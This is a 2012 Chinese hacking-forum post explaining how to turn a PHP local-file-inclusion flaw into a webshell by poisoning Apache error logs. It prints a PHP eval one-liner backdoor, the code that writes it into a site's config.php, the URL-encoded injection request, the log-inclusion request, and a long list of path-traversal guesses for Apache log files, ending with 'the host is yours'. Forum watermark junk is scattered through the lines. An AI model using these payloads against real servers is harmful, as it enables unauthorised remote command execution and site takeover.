找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2042|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 4 q! [! e3 u' q. M: _5 U7 l
) p( }* T; V2 n" p
比如还是这句一句话木马   t6 q$ X0 g) n0 p; u( U
<?eval($_POST[cmd]);?>   
6 n& R) M. @. U  s6 ]1 d
5 T5 ]! b) N, _- `' T) D9 R4 T1 F到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
6 u2 Z  P3 z' `. Sfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 ; e  o8 m, v) a" \- t! m; W
4 Z9 ~3 L+ }/ v: V: Q
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); 5 |- z+ G$ T, H# X6 G
fclose($fp);?>   //在config.php里写入一句木马语句
  a5 i2 C$ m3 S( ]+ e- r) R# s) r! O# P3 ?7 [
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
, }* z% U; G# P转换为
7 m. `0 ]8 r4 U; S%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
2 Z# m* z4 x0 m/ qconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
: {& a- q9 b* q# ]%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B % B; i# u, W. _$ G/ T
fclose%28%24fp%29%3B%3F%3E   ]6 X6 ]' D  ^5 x" u9 ]* Q8 p/ v
我们提交
. J1 E8 l9 R. `2 {+ Dhttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww - w- ]3 `' ^  G1 T* _
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp ) B: L- V- v6 y
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B ! i1 h: ?2 ~4 _% a# s
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E 8 k$ e/ o, I  N5 ]" C6 f5 s

! s1 P) V0 R4 s' K: T. `! F3 D这样就错误日志里就记录下了这行写入webshell的代码。
" w0 X; ~  S% o7 D3 E2 ?6 k! K, L我们再来包含日志,提交 . b, M8 [# g" n8 Y% _) f0 K9 z, [
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log % O# d. V; i- q6 O' L

# _' b% V' `8 D* R  o$ j3 y! U# `这样webshell就写入成功了,config.php里就写入一句木马语句 6 A; Q' _3 |" i- J% R
OK. # Y$ y1 n3 y+ O
http://www.xxx.com/forum/config.php这个就成了我们的webshell 9 U3 ~6 X& u) u  j) r  V
直接用lanker的客户端一连,主机就是你的了。 6 R3 D2 Y- X+ X- {

7 w) q7 `: m$ u+ x( XPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 4 Y8 P) `" \* O* m5 L

: T3 z8 p- u# k) m1 _$ ~8 y其他的日志路径,你可以去猜,也可以参照这里。
- l: u; R6 v* l- W  _. e+ A../../../../../../../../../../var/log/httpd/access_log ! q4 c) P" m1 I0 I
../../../../../../../../../../var/log/httpd/error_log 0 [( {, I$ f& l( {
../apache/logs/error.log * K8 X  s& c6 H) o/ O1 g/ F- p
../apache/logs/access.log ) o' L& d6 K" d, a/ Z/ X) {
../../apache/logs/error.log . M; w, s; h+ ]6 J* T7 w& e4 }
../../apache/logs/access.log / `4 `" f* }5 o* O: y+ |" a5 k
../../../apache/logs/error.log % T6 G! k+ J2 v4 X1 n5 G1 S
../../../apache/logs/access.log ; J4 i$ `2 T' D/ [8 C- h
../../../../../../../../../../etc/httpd/logs/acces_log + d+ q4 z- w' A) C+ c
../../../../../../../../../../etc/httpd/logs/acces.log ' [) X% q% X6 g; r! E
../../../../../../../../../../etc/httpd/logs/error_log
0 J. j; r7 ?' [8 Y7 _../../../../../../../../../../etc/httpd/logs/error.log " m. b8 {  t# a2 I( O- w
../../../../../../../../../../var/www/logs/access_log
5 U5 E3 K  j! e$ S../../../../../../../../../../var/www/logs/access.log 9 f# J5 I& A3 }( {1 N5 R' h8 a
../../../../../../../../../../usr/local/apache/logs/access_log ! i7 a+ F" i8 q' d/ n, l
../../../../../../../../../../usr/local/apache/logs/access.log , ~) ?( C' @) ^. ?
../../../../../../../../../../var/log/apache/access_log : F; K# b6 S7 w4 e8 U7 A
../../../../../../../../../../var/log/apache/access.log
& ~" Y$ k( t4 w$ ~8 P../../../../../../../../../../var/log/access_log % [8 Q; L8 |% q4 a/ B) \( v/ a
../../../../../../../../../../var/www/logs/error_log 6 L! U! Y5 S1 H# K" v5 N0 \  k
../../../../../../../../../../var/www/logs/error.log
% ?  u4 ~9 \. y) Z, z../../../../../../../../../../usr/local/apache/logs/error_log
% G" G( s. N0 T( |, o/ \../../../../../../../../../../usr/local/apache/logs/error.log 3 U0 |% A" @" p
../../../../../../../../../../var/log/apache/error_log 1 l* A& b& C0 F3 k: K8 ?
../../../../../../../../../../var/log/apache/error.log
/ P2 U# w7 J5 J../../../../../../../../../../var/log/access_log 6 W7 [8 W1 C- i8 g
../../../../../../../../../../var/log/error_log & x6 V( D" G  O+ \4 W# S) Q
/var/log/httpd/access_log       ( o- c. W; L- ~5 q+ \
/var/log/httpd/error_log     ; Z4 l1 B' Q  N9 e* i: ~
../apache/logs/error.log     
( h  A( E4 r$ y* v2 T8 P../apache/logs/access.log
, ]: p* i; H3 w3 i3 ]../../apache/logs/error.log
) o5 j, R/ |7 C- O../../apache/logs/access.log 6 B0 r9 T2 g. K9 t
../../../apache/logs/error.log
  `1 E8 Z" [0 T2 d4 y../../../apache/logs/access.log 2 J, j# t8 o" {( O. f& w
/etc/httpd/logs/acces_log
) S6 O% C* S" m( [1 C/ Z, x+ x, o/etc/httpd/logs/acces.log
9 h+ n, _. y" J/etc/httpd/logs/error_log 5 C' Z) ?0 p5 `4 t# J4 N; h
/etc/httpd/logs/error.log   U3 P% y5 l) c% e
/var/www/logs/access_log % ^- E* l2 E3 n, V+ r
/var/www/logs/access.log , ~0 m0 A1 G9 D' g7 {. {/ n
/usr/local/apache/logs/access_log & Z8 {. s# f& Y- B+ M3 l5 g6 Q
/usr/local/apache/logs/access.log
3 X, C/ V3 [6 O4 C) d  D/var/log/apache/access_log
0 t, L* \0 y: A) o3 Z/var/log/apache/access.log
7 I8 f$ X( {9 r# z% L/var/log/access_log
$ D5 h, c7 U8 z8 L" c# o( c/var/www/logs/error_log * b) _8 y9 h, k- _) S6 _6 p
/var/www/logs/error.log
* @/ ?6 {  U' l$ z$ H$ I- B/usr/local/apache/logs/error_log " A. E1 d, X" {% _; z5 F6 w5 l5 f  y
/usr/local/apache/logs/error.log * s) i- x3 G. e3 q) f$ o* m& R
/var/log/apache/error_log 5 z3 L& H  a- M0 B  U
/var/log/apache/error.log 3 v, c& w9 A- E* j9 U8 X
/var/log/access_log ! {8 Q" S- y: v" H1 ~3 n
/var/log/error_log
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表